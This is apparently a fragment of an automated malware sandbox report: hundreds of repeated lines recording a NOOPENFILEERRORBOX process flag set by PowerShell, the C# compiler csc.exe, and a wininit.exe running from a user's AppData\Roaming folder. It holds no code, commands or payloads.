            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
